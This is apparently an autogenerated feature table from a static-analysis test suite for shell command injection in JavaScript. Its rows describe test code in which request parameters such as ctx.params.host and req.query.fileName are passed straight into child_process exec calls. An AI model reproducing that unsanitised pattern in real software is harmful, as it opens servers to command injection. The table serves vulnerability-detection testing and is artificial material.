autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:41:85:45 | query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:41:85:45 | query | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:41:85:45 | query | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:41:85:45 | query | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:41:85:45 | query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:47:85:54 | fileName | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:47:85:54 | fileName | contextSurroundingFunctionParameters | (app)\n(req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:47:85:54 | fileName | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:47:85:54 | fileName | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:47:85:54 | fileName | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:1:90:32 | import ... outer"; | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:1:90:32 | import ... outer"; | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:1:90:32 | import ... outer"; | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:8:90:13 | Router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:20:90:31 | "koa-router" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:20:90:31 | "koa-router" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:90:20:90:31 | "koa-router" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:12 | router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:12 | router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:12 | router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router ... outer() | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router ... outer() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:7:91:27 | router ... outer() | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | exceptional return of new Router() | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | exceptional return of new Router() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | exceptional return of new Router() | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | new Router() | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | new Router() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:16:91:27 | new Router() | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:20:91:25 | Router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:20:91:25 | Router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:91:20:91:25 | Router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:6 | router | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:6 | router | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:6 | router | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:10 | router.get | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:10 | router.get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:93:10 | router.get | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | exceptional return of router. ... T OK\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | exceptional return of router. ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | exceptional return of router. ... T OK\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | router. ... T OK\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | router. ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:1:95:2 | router. ... T OK\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:8:93:10 | get | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:8:93:10 | get | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:8:93:10 | get | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | CalleeFlexibleAccessPath | router.get | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | calleeImports | koa-router | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:12:93:24 | "/ping/:host" | receiverName | router | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:93:26 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:93:26 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:93:26 | cp | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:93:26 | cp | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:93:26 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | 'arguments' object of anonymous function | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | 'arguments' object of anonymous function | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | 'arguments' object of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | CalleeFlexibleAccessPath | router.get | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | calleeImports | koa-router | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | async ( ... OT OK\\n} | receiverName | router | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | exceptional return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | exceptional return of anonymous function | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | exceptional return of anonymous function | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | exceptional return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | return of anonymous function | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | return of anonymous function | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:27:95:1 | return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:93:34:93:36 | ctx | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:4 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:4 | cp | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:4 | cp | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:4 | cp | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:4 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:9 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:9 | cp.exec | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:9 | cp.exec | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:9 | cp.exec | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:9 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | cp.exec ... s.host) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | exceptional return of cp.exec ... s.host) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | exceptional return of cp.exec ... s.host) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | exceptional return of cp.exec ... s.host) | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | exceptional return of cp.exec ... s.host) | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:3:94:36 | exceptional return of cp.exec ... s.host) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:6:94:9 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:6:94:9 | exec | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:6:94:9 | exec | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:6:94:9 | exec | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:6:94:9 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:17 | "ping " | stringConcatenatedWith | -endpoint- ctx.params.host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:11:94:35 | "ping " ... ms.host | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:23 | ctx | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:23 | ctx | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:23 | ctx | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:23 | ctx | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:23 | ctx | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:30 | ctx.params | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:30 | ctx.params | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:30 | ctx.params | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:30 | ctx.params | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:30 | ctx.params | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:21:94:35 | ctx.params.host | stringConcatenatedWith | 'ping ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:25:94:30 | params | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:25:94:30 | params | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:25:94:30 | params | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:25:94:30 | params | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:25:94:30 | params | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:32:94:35 | host | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:32:94:35 | host | contextSurroundingFunctionParameters | (ctx) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:32:94:35 | host | enclosingFunctionBody | ctx cp exec ping ctx params host | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:32:94:35 | host | enclosingFunctionName | router.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:94:32:94:35 | host | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:1:1:1 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:1:7:1:8 | cp | contextFunctionInterfaces | 